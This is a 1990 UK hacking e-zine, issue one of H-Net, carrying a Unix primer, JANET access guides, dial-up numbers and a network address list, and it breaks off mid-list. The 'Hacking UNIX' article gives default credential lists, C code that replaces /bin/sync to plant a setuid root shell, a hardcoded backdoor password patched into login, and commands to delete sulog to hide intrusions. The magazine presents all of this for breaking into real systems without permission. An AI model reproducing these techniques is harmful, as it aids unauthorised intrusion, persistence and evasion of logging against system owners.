H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #01 of 20 H N N E June 1st, 1990 E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H Welcome to the first issue of the H-Net textfile hacking magazine! H-Net magazine is absolutely free of charge and can be freely distributed on the condition that all the files that constitute each magazine should remain together and not be altered or split. Although H-Net is free I would like to receive contributions from readers to keep the magazine alive, you can do this by uploading files in Ascii or ARC format to Hackernet BBS in England - details of which are given at the top of this file and periodically throughout the magazine. Alternativeley you can send any articles on disk (5 1/4 or 3 1/2 inc h disks) again in Ascii or ARC (PC or ST) format to the address at the bottom of this file. Thank you. Bauderline, Editor of H-Net and Sysop of Hackernet BBS. H-Net contributions to:- [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs.] OR H-Net Magazine, PO BOX TR18, LEEDS, LS12 5TB, ENGLAND, UK. ---------------------------------------------------------------------------- This issue of H-Net includes the following: #01 Index of H-Net #1 by Bauderline. (03k) #02 Welcome message and intro to H-Net (03k) #03 An Introduction to Unix Part 1 by Minotaur (13k) #04 Hacking Unix Part 1 by Weazle (14k) #05 Beginners Guide to JANET by Weazle (07k) #06 JANET Pad phone numbers by Boris (04k) #07 JANET Network Address List (09k) #08 Comshare PADS & Info by Knight_of_ni & Co. (06k) #09 How to Crack those PASSWORDS! (06k) #10 Default Passwords by Nik & Bauderline (03k) #11 CCITT Specifications by Zed Haytey (04k) #12 Hacking DATASTREAM, logfile by Minotaur (34k) #13 Hacking SIGNET, logfile by Weazle (06k) #14 OPEN UNIVERSITY phone numbers by Zed Haytey (02k) #15 MERCURY off-peak phone charges by Bauderline (03k) #16 UNIX-Help conf. from UNAXCESS BBS (JANET) (18k) #17 H-Net World News by Bauderline (07k) #18 Some Useful Addresses by Screaming Wall (02k) #19 Hackers BBS list from HACKERNET BBS (03k) #20 An Unashamed plug for the Hackernet BBS! (03k) =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #02 of 20 H N N E Welcome to H-Net Magazine! E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H Welcome to the first issue of the H-Net textfile hacking magazine! H-Net magazine comes to you from the Hackernet BBS in England - Telephone [LEEDS,UK](0532 557739), speeds available from 300 to 2400 baud. Who is H-Net intended for? Hackers and Phreakers from all over the world - from beginners to out and out experts. What sort of articles will H-Net have? Anything and everything to do with hacking and phreaking. Obviously this magazine will only survive by getting contributions from it's readers - so in effect the subjects discussed in H-Net will depend to a large extent on the content of the contributions received. Especially welcome are Hackers Guides to different types of systems which have not been previously covered and also log files of hacks or articles of hacking news from around the world (arrests etc.etc.). H-Net magazine is absolutely free of charge and can be freely distributed on the condition that all the files that constitute each magazine should remain together and not be altered or split. Although H-Net is free I would like to receive contributions from readers to keep the magazine alive, you can do this by uploading files in Ascii or ARC format to Hackernet BBS in England - details of which are given at the top of this file and periodically throughout the magazine. Alternativeley you can send any articles/files on disk (5 1/4 or 3 1/2 inch disks) again in Ascii or ARC format to the address at the bottom of this file. H-Net Hackers Scruples :- Dont destroy or alter files or data. Dont 'dump' a system - anybody can do that, but it's usually a loser that does! I hope that you enjoy H-Net and that we can produce further issues together!! Bauderline, Editor of H-Net and Sysop of Hackernet BBS. H-Net contributions to:- [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs.] OR H-Net Magazine, PO BOX TR18, LEEDS, LS12 5TB, ENGLAND, UK. =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #03 of 20 H N N E An Introduction to UNIX, by MINOTAUR. E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H UNIX is widely-touted as 'the operating sustem of the future', though in fact it dates from 1969 (it was developed originally by Bell Laboratories, which runs most of the telephone systems in the USA). Since then it's been under continuous development; so it's not so much an old operating system as a fairly mature one, if you see what I mean. Hackernet BBS has many unix files for you. Unix gets brownie points straight off because it was conceived by a user of computers rather than a software specialist or some other sort of software designer. So it is relatively easy to use; which nearly all other software the prime goal often seems to be to make money, or to sell more hardware and software, or whatever. In brief, UNIX is a general-purpose, multi-user operarting system with a clever method of holding files. It's a complex system, which means both that it is rich in facilities and difficult to get to grip with - until now!..... BEGINNER'S GUIDE TO THE WONDERFUL WORLD OF UNIX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The aim of this first textfile is to give an insight into the fundamentals of UNIX. Subsequent textfiles will delve into all areas of UNIX in greater depth. WHAT IS UNIX? ~~~~~~~~~~~~~ The UNIX operating system can be divided into a number of distinct parts. First there is the part of the system which performs all of the interface to the hardware, scheduling disks, managing memory, handling terminal I/O and generallu handling any requests to and from the devices on the system. This part of UNIX is called the UNIX Kernel. It is in fact one large, compiled 'C' program which is kept on the hard disk and loaded into memory when the system is booted up. The UNIX Kernel is always kept in memory because practically everything that is done on UNIX uses the Kernel. Buts on its own, it is of little use. There is no point in just having an interface to the hardware - an itnerface to the user is also required. This is provided by the UNIX shell. The shell is another name for a TIP (Terminal Interface Program) or a JCL (Job Control Language). Its job is to read input from the terminal and execute the right programs, depending on the input. A program which is executing in UNIX is called a process. In fact, the shell is also a 'C' program which is executing for each terminal which is logged on. It reads input from the terminal, interprets the input in various ways and starts the appropriate processes. As well as interpreting input and executing processes, the shell has its own control-flow constructs and it can therefore be used as a programming language. It also handles pipes and redirection of I/O which will be the subject of a later textfile. The way the UNIX shell works is much the same as other operating systems. It displays a prompt, normally '$' the user types in the command to execute and the shell reads the command, searches for the program which is the same name as the command typed in and it then executes this file, if it found it. When the program finishes executing, the shell redisplays the prompt to the terminal. OK, so we have a Kernel to handle the devices and a Shell to interpret input form the users terminal. The final and by far the largest part of UNIX is the Programs. There are many Programs in UNIX which form a part of the operating system. In UNIX jargon, these are called Utilities. There are Utilities to look at directories, edit files, semd files to the line printer, perform backups, look at files, delete files, the list is endless. These Utilities are, to the user, commands which are typed in at the terminal prompt. For example; 'ls' is the UNIX Utility to list the directory; 'cd' is the Utility to change directory. In some systems the Utilities form a part of the terminal interface program which interacts with the user. In UNIX, very few Utilities are a part of the Shell, the majority of them are external to the Shell and are called up whenever they are needed. This is because there are 200-300 UNIX Utilities, and including all of them in the shell would obviously increase the size of the Shell to an unreasonable level. It is much neater to keep them on the disk to be called as and when they are needed. On a typical UNIX system, as well as the operating system, there would also be some other packages, word processing, spreadsheets, etc. These are necessary because UNIX does not include any of these - UNIX is only an Operating System. THE UNIX FILE STRUCTURE ~~~~~~~~~~~~~~~~~~~~~~~ The above description of UNIX is very conceptual. You never actually se the UNIX Kernel, excpept perhaps as a process on the system. The Shell too, is just always there when you login. The file structure, however, has to be manipulated and managed by the user all the time. The UNIX file structure is hierarchical. Within the file structure there are files and there are directories - as shown in the diagram below :- /(root) | _________________________________________________ | | | | | | | bin dev etc lib tmp unix usr | | | | | | | ----- ----- ----- ----- ----- ----- ----- | | | | | | | | | | | | | | | | | | | | | --- --- ||| ||| Files contain data and directories contain either files and/or directories. At the top of the hierarchy is the ROOT directory, this is sometimes referred to as /(slash). Below the root directory are the system files and directories. When a user logs into the system, he logs into his HOME directory. Every user of the system has a HOME directory where he can create and delete files and directories. This part of the system belongs to him. User directories are usually kept in the directory 'usr' which is directly below the root directory. For example, say the user Fred has the directory structure as shown below :- /(root) | usr | fred | ---------------------------------- | | | | | cprogs memos wpfles sprdsht pending | | | | | ----- ----- ----- ----- ----- | | | | | | | | | | | | | | | 1990 When Fred logs on he will automatically go to the directory 'fred'. If however, Fred wants to examine his spreadsheets, he may want to go to the spreadsheet directory. He would do this by using the 'cd' command to change directory, i.e: $cd sprdsht This command would make his CURRENT DIRECTORY the spreadsheets directory but his HOME directory wouls remain the same. If he wanted to move to his 1988 directory from his home directory the command would be : $cd sprdsht/1990 The '/' between the two directory names is the delimiter. The construct 'sprdsht/1990' is called a Pathname. Infact this particular type of Pathname is called a Relative Pathname because it is relative to the directory the user is currently in. That is, the path 'sprdsht/1990' would be meaningless if the users current directory was 'wpfls'. Another type of pathname is an Absolute Pathname. This, as the name suggests, is a path from the root directory and is therefore independent of the user's current directory. Absolute pathnames are represented by using a '/' as the first character of a path. For example, the Absolute Pathname of the directory mentioned would be '/usr/fred/sprdsht/1990'. The command :- $cd /usr/fred/sprdsht/1990 would take Fred right to the directory regardless of his current directory. the command to find the Absolute Directory is :- $pwd The stands for 'print working directory'. As mentioned above, the command to look at the contents of a directory is 'ls'. By simply typing :- $ls a list of filenames is output. This looks like :- cprogs memos wpfls sprdsht pending This is fine if just the names is required but, it is impossible to tell from this information which are files and which are directories. As with a lot of UNIX commands, the 'ls' command performs a mimimum function. UNIX commands, generally speaking, have a number of options which can be used with them, depending on exactly what the user wants. For example the 'ls' command just lists directories, if you want extra information, you have to ask for it. UNIX must have either been written by a mimimalist or someone who didn't like typing!!! It does no more and no less than it is asked to, this is something that users find quite difficult to understand. The 'ls' command is the perfect example of this. In most other systems it would be called 'dir' or 'list'. The most commonly used option with 'ls' is 'ls -l'. In this case the 'l' stands for 'long'. The command therefore produces a long listing of the current directory. The output looks soemthing like that shown below :- drwxr_xr_x 4 Fred 96 Jun 1 10:00 cprogs drwxr_xr_x 4 Fred 195 Jul 25 09:34 memos drwxr-xr_x 2 Fred 167 Aug 14 17:29 wpfls drwxr_xr_x 2 Fred 84 May 7 07:56 sprdsht drwxr_xr_x 2 Fred 952 Jun 16 13:51 pending This will tell you whether the entry is a file or a directory. The permissions (r is for read, w is for write, x is for execute), the number of links to the file, the owner, the size (in bytes), the date it was last modified, and the name of the entry. Options for the commands are sometimes (not always) preceeded with a minus sign and they usually consist of a letter which usually stands for something. The reason for this vagueness in the format of UNIX is that UNIX has evolved through time and commands have been written by a variety of people from a variety of places so there are no hard and fast rules - this is another thing that newcomers to UNIX find frustrating. It would be true to say that for each one of the 'rules' mentioned above, there are exceptions. There are also special commands for adding and removing directories from the directory structure. They are 'rmdir' for removing directories and 'mkdir' for making directories. They both expect a Pathname as a parameter which is the name of the directory to be created or removed. For example, to create the directory 'letters' below the directory 'wpfls' from Fred's HOME directory :- $mkdir wpfls/letters To remove this directory :- $rmdir wpfls/letters The command 'rmdir' will only remove empty directories, that is directories which do not contain files or sub-directories. Every directory in UNIX has two hidden entries, these are '.'(dot) and '..' (dot-dot). These are created when the directory is created. '.' references the current directory and '..' references the directory above the current directory (called the Parent directory). These two directories are in fact the key to the way the whole file system is put together. They can be seen by using the '-a' option in the 'ls' command (i.e. 'ls -al') and they can also be used in relative pathnames. For example :- $cd ../wpfls from the directory 'sprdsht' in Fred's HOME directory is a perfectly acceptable command. With these commands many generations of UNIX users have had their first foot-hold on UNIX. If you have any UNIX problems or comments to make then please leave me (MINOTAUR) a message on the Hackernet BBS. Minotaur. =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #04 of 20 H N N E Hacking UNIX, part 1, by WEAZLE. E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H UNIX HACKING - PART 1. ---------------------- You've got the 'login:' prompt - what now? try the following id's and passwords:- ID Password -------- -------- root root sysman sysman admin admin sysadmin sysadmin (or admin) unix unix uucp uucp (or comms) rje rje guest guest demo demo daemon daemon sysbin sysbin (or bin) bin bin games games (or player sometimes) Some of these id's might not even need a password - in that case you will go striaght through to the '$' prompt when you have entered the ID!! Some of you might be thinking that the above accounts would be the most likely ones for any hackers to try and therefore the system manager of a UNIX system would put a password on such accounts or at least change passwords to something a little less obvious - well I would think that too - but it is suprising what percentage of systems you can get into by trying out the above accounts. I don't know why the System Managers havent done anything about these accounts, it is probably the old British attitude of 'it will never happen to our system' - it can and probably will! And dont think that it is only the small companies that dont do very much about the security of there UNIX systems - I logged onto a BT Unix computer (on a freephone/toll-free number I might add) with no id's or passwords so I just started using some of the ones listed above - none of the ones that I used worked - I was just about to give up when I thought that I would try one last ID and Password before disconnecting and throwing the number away. I didnt think for one moment that the ID that I was going to try would work, after all it was one of British Telecoms UNIX machines - and of course they would be really strict about security and things like that, but I will go ahead and try it anyway... :- login:sysman password:sysman $ I nearly fell off my chair when I got through on this account and to the '$' UNIX prompt, how could British Telecoms computer security be so lax? Who cares, I was in! - and there was no password on the SU command!!! There is a list of default passwords in this issue and continuous updates on Hackernet BBS. If none of these accounts let you in then try obvious things like first names (paul,john,steve,etc.), try using the id 'who' which on some systems will at the 'login:' prompt tell you who else is on (useful clues for hackers!) or see if there are any clues on the logon screen eg "Welcome to British Telecoms RACE computer" you would try things like race,race or btr/engineer, est. ok? When you have logged onto a UNIX system, you should always do the following: $ who -u $ ps -ef $ ps -u root This prints out who is on, who is active, what is going on and what they are doing at the moment, everything in the background, and so on. If you are calling the UNIX system for the first time you should enter the following :- $ grep :: /etc/passwd This command will output to your screen parts of the 'passwd' userlist. The ones that we are interested in are the ones like this :- paul::3323:2343:race user:/usr/paul i.e. the ones with '::' after the username (paul in this case). What this means is that the user paul does not need a password to log on - funnily enough it is usually such accounts that have the highest level of access! Also do this: $ find / -name "*log*" -print This lists out all the files with the name 'log' in it. If you do find a process that is logging what you do, or an odd log file, change it as soon as you can. If you think someone may be looking at you and you don't want to leave (Useful for school/college or university computers) then go into something that allows shell breaks (VI for example), or use redirection to your advantage: $ cat < /etc/passwd That puts 'cat' on the ps, not 'cat /etc/passwd'. If you're running a setuid process, and don't want it to show up on a ps (Not a very nice thing to have happen), then: $ super_shell # exec sh (Runs the setuid shell (super_shell) and puts something 'over' it. You may also want to run 'sh' again if you are nervous, because if you break out of an exec'ed process, you die. Neat, huh? Improving your id: Firstly, you should issue the command $id The system will then tell you your uid and euid. This is useful for checking on setuid programs to see if you have root euid privs. Also, do this: $ find / -perm -4000 -exec /bin/ls -lad {} ";" Yes, this finds and does an extended list of all the files that have the setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of them look nonstandard, play with them, you never can tell what a ^| will do to them sometimes. Also, if any are writeable and executable, copy sh over them, and you'll have a setuid root shell. Just be sure to copy whatever was there back, or else your stay might not last very much longer. What, you have the 'bin' passwd? Well, game over. You have control of the system. Everything in the bin directory is owned by bin (with the exception of a few things), so you can modify them at will. Since cron executes a few programs as root every once in a while, such as /bin/sync, try this:- main() { if (getuid()==0 || getuid()==0) { system("cp /bin/sh /tmp/sroot"); system("chmod 4777 /tmp/sroot"); } sync(); } ..continued from previous page... $ cc file.c $ cp /bin/sync /tmp/sync.old $ mv a.out /bin/sync $ rm file.c Now, as soon as cron runs /bin/sync, you'll have a setuid shell in /tmp/sroot. Feel free to hide it. The 'at' & 'cron' commands l ook at the 'at' dir. Usually /usr/spool/cron/atjobs. If you can run 'at' (check by typing 'at'), and 'lasttimedone' is writable, then submit a blank 'at' job, edit 'lastimedone' to do what you want it to do, and move lasttimedone over your entry (like 88.00.00.00). Then the commands you put in lasttimedone will be ran as that file's owner. Cron: in /usr/spool/cron/cronjobs, there are a list of people running cron jobs. Cat rot's, and see if he runs any of the programs owned by you (Without doing a su xxx -c "xxx"). For that matter, check all the crons. If you can take one system login, you should be able to get the rest, in time. The disk files. These are rather odd. If you have read permission on the disks in the '/dev' directory then you can read any file on the system. All you have to do is find it in there somewhere. If the disk is writeable, if you use /etc/fsbd, you can modify any file on the system into whatever you want, such as by changing the permissions on '/bin/sh' to 4555. Since this is pretty difficult to understand I won't bother with it any more. Trivial su. You know with su you can log into anyone elses account if you know their passwords or if you're root. There are still a number of system 5's that have uid 0, null passwd, rsh accounts on them. Just be sure to remove your entry in the '/usr/adm/' directory - the log file is called 'sulog' and can be removed with the following command if you havent mastered the UNIX editor 'VI' yet :- $ rm /usr/adm/sulog or sometimes:- $ rm /usr/admin/sulog but one command that I always use on any new system conquest is :- $ find / -name "sulog" -print This will find all the files called 'sulog' - as some system managers have been known to have two sulogs running at the same time, if you delete or edit the one in the usual directory and then they would have a backup copy in another directory as well. Trojan horses? On unix? Yes, but because of the shell variable PATH, we are generally out of luck, because it usually searches the '/bin' and '/usr/bin' directories first. However, if the first field is a colon, files in the present directory are searched first. Which means if you put a modfied version of 'ls' there..... If this isn't the case, you will have to try something more blatant, like putting it in a game. If you have a system login, you may be able to get something done like that. See cron. Taking over Once you have root privs, you should read all the mail in the '/usr/mail' directory just to be sure that nothing interesting is in there, or anyone is passing another systems passwd about even! You may want to add another entry to the passwd file, but that's relatively dangerous to the life of your machine. Be sure not to have anything out of the ordinary as the entry (i.e., No uid 0). Get a copy of the login program (if at all possible) of that same version of unix, and modify it a bit. On system 5, here's a modification pretty common in the routine to check correct passwds, on the line before the actual pw check put a if (!(strcmp(pswd,"h-net"))) return(1); to check for your 'backdoor' password "h-net", enabling you to log on as any valid user that isn't uid 0 (On system 5). Other UNIX tricks Have you ever been on a system that you couldn't get 'root' status or read the Systems/L.sys file? Well, this is a cheap way to overcome it:- $ uuname will list all machines reachable by your unix, then, assuming that they aren't direct, and that the modem is available:- $ cu -d host.you.want [or] $ uucico -x99 -r1 -shost.you.want Both will do about the same for us. This will fill your screen with lots of trivial information, but will eventually get to the stage of printing the telephone number to the other system. '-d' enables the cu diagnostics, '-x99' enables the uucico highest debug, and '-R1' says 'uucp master'. A year or two ago, almost every system had their uucp password set to the same thing as their nuucp passwd (Thanks to the Systems file), so it was a breeze getting in. Even nowadays, some places do it.. you never can tell. Uucp Uucico and uux are limited by the Permissions file, and in most cases, that means means you can't do anything except get & take from the uucppublic directories. Then again, if the permission/L.cmd is blank, you should be able to take what files you want. Sending mail Sometimes, the mail program checks only the shell variable LOGNAME, so change it, export it, and you may be able to send mail as anyone. Mainly early system five's will let you do it thus :- $ LOGNAME="root";export LOGNAME Printing out all the files on the system Useful if you're interested in the filenames:- $ find / -print >file_list& And then do a 'grep text file_list' to find any files with 'text' in their names. Like grep [.]c file_list, grep host file_list.... Printing out all restricted files Useful when you have root privileges. As a normal user, do :- $ find / -print >/dev/null& This prints out all non-accessable directories, so become root and see what they want to hide from you! UNIX Humour On a system 5, do this :- $ cat "food in cans" or :- $ banner "H-Net Lives!" Hehehe...... Password hacking -Salt In a standard /etc/passwd file, passwords are 13 characters long. This is a 11 char encrypted passwd and a 2 char encryption modifier (salt), which is used to change the DES (data encryption standard) algorithm in one of 4096 ways. Which means that there is no decent way to go and reverse hack it. Yet. On normal system 5 UNIX systems passwords are supposed to be 6-8 characters long and have both numeric and alphabetic characters in them. Which makes a dictionary hacker pretty worthless. However if a user keeps insisting that his password is going to be 'h-net' usually the system will comply (Depending on version). I have yet to try it, but having the hacker try the normal entry, and then the entry terminated by [0-9] is said to have remarkable results, if you don't mind the 10-fold increase in time. Written by the Weazle, (Hackers Hideout on Hackernet BBS) =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #05 of 20 H N N E Beginners Guide to JANET by Weazle. E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H JANET (the Joint Academic NETwork) is a favourite hacking tool for newcomers to hacking - mainly because it and the computers attached to it offer you so much help and information which can be used to do nice things with their micros! Hey ho and here we go! The first thing that you need to do is to find a telephone access number for the JANET pad nearest to you. To help you do this please refer to file #6, in this issue of H-Net which is Hackernet BBS's latest list of such numbers and in some cases gives the baud rates which have been tested out on these pads. When you have found the telephone number that you need then set your comms terminal to seven bits, even parity with one stop bit (7e1). Then dial the telephone number (a baudrate of 2400 is sometimes catered for - but is unreliable on some pads). When you get the CONNECT message press your key a couple of times, if nothing happens then wait about 4 seconds then press the key two or three times again. You should now get a 'welcome' message (on some PADS you might now get the prompt 'Which Service?' type 'PAD' ) the ypu will get a system prompt (e.g. 'PAD>'). If you do not get such a prompt then drop the line and reconfigure your comms s/w (you might have to do this a few times until you work out the proper settings as all pads do not work on a uniform setting - unfortunately! - but it's all good hacking experience anyway - trying to work out the proper settings for the target system. When you have the 'PAD>' or a similar prompt then type the following command:- PAD> logon f,r the pad isn't really all that fussy about what you use after the 'logon' command, 'f,r' is just an example - in practise you could use anything, most people use 'x,x' for some reasonh...please note that on some pads that you might have to type 'login' instead of 'logon'. What does this command do? Well it tells the JANET Pad that when you have called through to one of the computers connected to it's network - done your business then exited from that computer that you want to return to the 'PAD>' prompt so that you can 'CALL' other computers on the network. If you do not enter this command your line will be dropped when you have exited from the first computer on the network that you have called - and that would mean having to redial the pad again....yawn! The next command to get to grips with is the 'CALL' command. This along with a NETWORK ADDRESS allows you to connect to other computers on the JANET network. In file #7 in this issue of H-Net you will find a list of some of the computers that you can connect to on the JANET network along with their NETWORK address and/or their NETWORK mnemonic. The way to use the 'CALL' command is as follows :- firstly, find the NETWORK ADDRESS of the computer that you wish to connect to (in this example the Unaxcess chatboard at Bradford University which is 0000121100 ), then type the following at the 'PAD>' prompt :- PAD> call j.0000121100 The 'j.' just tells the pad to expect a JANET address. Please note that some PAD managers have gotten wise to hackers using their PADs to gain access to systems on the JANET network, in these cases they might have changed the format of the 'CALL' command around a little bit - usually by making it so that the '.' after the 'j' in the above example is no longer required - on such systems the 'CALL' command should be :- PAD> call j0000121100 On some PADs there is on online help facility - to make use of this just type:- PAD> help you should get a response similar to this :- Help knows about :- ADDRESS TARIFFS STATUS The address helpfile is usually quite useful - to get this type :- PAD> help address then a nice list of network mnemonics available from that PAD might start scrolling down your screen. Mnemonics can be used instead of the NETWORK ADDRESSES previously mentioned. For instance if we wanted to call the Lancaster Universities' PD software computer system use the following call command :- PAD> call lancs.pdsoft It is just a nice way to be able to access the systems on the network as they cannot expect the average student or lecturer to remember the 10 or 14 digit NETWORK ADDRESSES which prevail on the JANET system! When you have entered your 'CALL' command you should get a response such as 'connecting..' if you just get garbage then you might need to change the configuration of your terminal. For instance if you call the pad using 7e1 then when you call an address and just get garbage then quickly switch to 8n1 and press return once - you should then get some sense out of the computer that you have requested access to (usually a 'login:' or similar prompt). If this does not work then keep on changing your settings until you do get in. From here on in it will be just like calling the target computer direct, except that when you exit from the computer you will be returned to the 'PAD>' prompt again (if you remembered to enter your 'logon' command!), again - if you just get garbage after terminating your session on a computer on the JANET network then you will need to reset the configuration of your comms s/w / terminal to what it originally was when you first called the PAD. Well, that just about sums it up I guess - this should be all you need to know about using the JANET system and pads - the little quirks it has and so on. The best thing about JANET in my eyes is that (usually for the price of a local call) you can get into computers all over the world, belonging to mainly educational establishments but also defence and other organisations! The main type of computers that you will find on JANET are VAX, UNIX and PRIME with a splattering of other systems here and there. I hope that this file has been of help to you - if you have any new information about JANET in general or some of the systems available through it then please e-mail me 'WEAZLE' on the Hackernet BBS. WEAZLE. =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #6 of 20 H N N E JANET PAD PHONE NUMBERS by Boris. E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H JPAD12.TXT ---------- JANET PAD listing - revision 1.2 - 1st March 1990 To start you off, two excellent public-access systems exist on JANET that are CRAMMED with info and useful clues for would-be hackers! These are: JANET News Machine: 000050005002 (login as 'NEWS' - no password needed) NISS Bulletin Board:000062200000 These two systems will give you plenty of starting points for possible hacks (net addresses etc). But make sure that you're on a local call if possible -before I found these PAD numbers, I spent 3 hours on a long-distance call to the Janet News Machine!!! Hope this info is of use and interest - leave a msg for 'Boris' on Hackernet BBS if you have questions/comments/suggestions/good passwords!! One more thing - try calling 000002010001 - this is a PD software archive run by Lancaster Uni. - they carry s/w for PC, ST, Amiga, BBC and (I think) other machines as well. Eventually I'll put up a file on here going intomore detail...(by the way, you'll need to login with username 'pdsoft' and password 'pdsoft' - both in lower case) Bye for now, and have great fun - I did! Cheers, Boz Birmingham U...............021-471-2611 021-471-2101 Cambridge U................0223-338888 (V21/23) 0223-338848 (V21/22/22bis/23) Cranfield U................0234-752795 0234-752796 Daresbury U................0925-68461 (V21/22/22bis/23 and MNP) * Durham U...................091-374-2832 Edinburgh U................031-667-1071 (V21/22) Glasgow U..................041-334-8100 U. of Lon. Comp. Centre....071-831-6171 (V21/22) 071-831-6181 (V23 - 8-N-1) * U. College Lon.............071-388-2333 (V21/22/22bis) * Queen Mary's College Lon...081-980-7100 (V21) 081-981-7331 (V23) King's College Lon.........071-379-7985 (V21) 071-240-4928 (V23) Lancaster U................0544-677544 (V21/22/22bis/23+MNP - 8-N-1) * Leeds U....................0532-461514 (use CALL Jnnnnnnnnnnnn) * Nottingham U...............0602-507521 (V21/22/22bis/23) * 0602-507522 (V23) 0602-507523 (V22) * Oxford U...................0865-722311 (V21/22/22bis/23) Strathclyde U..............041-552-8467 York U.....................0904-433826 (V21) 0904-433827 (V23) UPDATES WITH THIS REVISION (1.3): Added Leeds Uni's PAD (0532-461514). Changed the line format slightly to squeeze in more comments. Changed the format of the introductory notes to make them more readable (!) Changed all London 01 codes to the new 071/081 format. REVISION 1.2 (1 Mar '90) Another name change - to JPADxx.TXT. Hopefully this is easier to type - and leaves me a bit of room for extending the filename if necessary! ULCC's V23 node (071-831-6181) is actually 8-N-1 and not 7-E-1 as listed in previous revisions. The PAD's which I have actually tested and found to work OK are now markedwith asterisks (*). REVISION 1.1 (18th Feb '90) Lancaster Uni's PAD actually uses 8 bits, no parity, one stop bit instead of 7-E-1! Apologies for the error...No more mistakes detected so far...! Cheers, Boz. =============================================================================== [Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine] H-NET H-NET H-NET H-NET H-NET H-NET H-NET H N N E ** H-Net Magazine ** E T T H Volume One, Issue 1, File #07 of 20 H N N E JANET NETWORK ADDRESS LIST E T T H-NET H-NET H-NET H-NET H-NET H-NET H-NET H > >Introduction >____________ > >This is an address list of all the JANET mnemonics that can be accessed via >the JANET Packet SwitchStream Gateway. > >The list is sorted in numerical order using the machine address. > >The list is divided into 3 columns which show: > >a. The numeric address (DTE address) > >b. A mnemonic for the address > >c. A description of where the machine is located. > >Address List >____________ > Frm 2; Next> >ADDRESS MNEMONIC DESCRIPTION >_______ ________ ___________ > >000000000002 RLIB IBM 3081 VM/370 at Rutherford >000000000002.XXX RLIB >000000000002.XXXP RLIBP RAL IBM full screen 3270 emulator >000000000003 RLIC RAL IBM MVS >000000000003.XXX RLIC >000000000003.XXXP RLICP RAL IBM MVS full screen. >000000000003.XXXS RLICS RAL IBM MVS >000000000006 RLPA PRIME at Rutherford (Prime A) >000000000023 RLPC EBL PRIME at RAL (Prime C) >000000000025 WKPA PRIME at Warwick >000000000033 RLVS Starlink VAX 11/780 at Rutherford >000000000040.PSS PSS >000000000040 RLXA RL GEC 4160 PSS Gateway >000000000065 RLVB BCRG VAX 11/780 at Rutherford >000000000067 RLGM GEC 4190 - ALVEY Mail Machine >000000000069 RLVC RAL VAX 11/750 St/CB in R26 >000000001200 ZIIA IBM 4341 Imperial College >000000001200.XXXP ZIIAP IBM 4341 Imperial College >000000002101 RLPF PRIME - Technology Division Frm 3; Next> >000000002102 RLPE PRIME - Lab overheads. >000000002104 RLPG Ral Tech Division PRIME >000000002105 RLGB ICF GEC 4090 - RLGB at Rutherford >000000002202 RLXC Reverse Pad at RAL >000000002251 BAPA BATH Prime 2250 >000000002500 RLGD RL ISG 4090 >000000002507 XXDB Oxford PDP-11/70 >000000002600 GXVA RGO VAX 11/750 >000000002602 GXVS RGO STARLINK VAX 11/780 >000000004012 RLDE R3 PDP-11 SNS >000000004200 RLPH RAL Technology Div. PRIME >000000004400 RLNA R25 Nord (EISCAT Project) >000000004600 RLVA HEP VAX 750 >000000004601 RLVE CD VAX 11/750 (VMS) >000000004602 RLVD IKBS Vax 11/750 at RAL >000000004603 RLVF ALVEY VAX DEV. >000000004605 RLVI EBL VAX >000000004606 RLVJ Technology Div. Microvax II >000001000200 DLGD DL GEC at DL (Network converter) >000001000200*D:NETSTAT NETSTAT >000001000200*D:ITP.1000450.046400 TELLDL >000001000200*D:ITP.1000450.04FE00 HELPDL Frm 4; Next> >000001000200*D:ITP.1000450.46500 NETMON >000001000200*D:ITP.1000450.44400 LOG >000001009400 DLGE DL GEC 4090 at Daresbury >000001002000 DLVA DL SRS VAX 11/750 at Daresbury >000001002100 DLGM DL GEC 4065 MAIL machine >000001003000 DLVB DL VAX B >00000100900000 DLIB DL - MVS service >00000100900010 DLIB DL - MVS service >000001011700 DLGA DL CSE/1 GEC 4190 at Daresbury >000001011750 NNGA DL NSFD/R1 at Daresbury >000001080500 LEVA VAX at Leeds University (Mech Eng) >000001500100 NEDA Newcastle DCS-UNIX front-end >000001500200 NEVA Newcastle VAX 11/780 >000002002100 ZKGA GEC 4065 at Kings college, London >000002005002 ZUVS Starlink VAX at UCL >000002005003 ZUPA PRIME at UCL >000002009001 ZMVA QMC Physics VAX. >000004008100 HQGA GEC 4090 at NERC Swindon >000005112300 ZUVA HEP Vax at UCL (Physics Dept). >000005181000 RHVA Vax at Royal Holloway. >000006000000 YKXA DEC10 Gateway at York (BALHAM) >000006000003 YKDB S/W Technology Vax 11/750 Frm 5; Next> >000007002002 REVS Starlink VAX at ROE >000007004001 EKVA East Kilbride Kelvin Lab VAX >000007012001 PAVA Paisley VAX >000008002020 CAXA X29 G/way to Cambridge Data Network >000008005001 CAVS Starlink VAX at Cambridge >000008006001 EAPA PRIME 550 at East Anglia >000008006002 